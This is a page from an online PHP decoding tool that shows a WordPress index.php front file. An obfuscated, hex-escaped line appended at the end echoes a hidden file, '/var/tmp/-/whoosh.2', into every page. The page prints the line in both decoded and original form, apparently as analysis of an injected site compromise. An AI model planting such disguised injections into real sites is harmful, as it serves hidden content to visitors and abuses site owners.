Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Front to the WordPress application. This file doesn't do anything, but load..

Decoded Output download

<?php 
/** 
 * Front to the WordPress application. This file doesn't do anything, but loads 
 * wp-blog-header.php which does and tells WordPress to load the theme. 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Tells WordPress to load the WordPress theme and output it. 
 * 
 * @var bool 
 */ 
define( 'WP_USE_THEMES', true ); 
 
/** Loads the WordPress Environment and Template */ 
require __DIR__ . '/wp-blog-header.php'; 
echo file_get_contents("/var/tmp/-/whoosh.2"); ?>

Did this file decode correctly?

Original Code

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
echo file_get_contents("\x2f\x76\x61\x72\x2f\x74\x6d\x70\x2f\x2d\x2f\x77\x68\x6f\x6f\x73\x68\x2e\x32");

Function Calls

define 1

Variables

None

Stats

MD5 9fdb147844850c14cc0cb0d633da3f8d
Eval Count 0
Decode Time 49 ms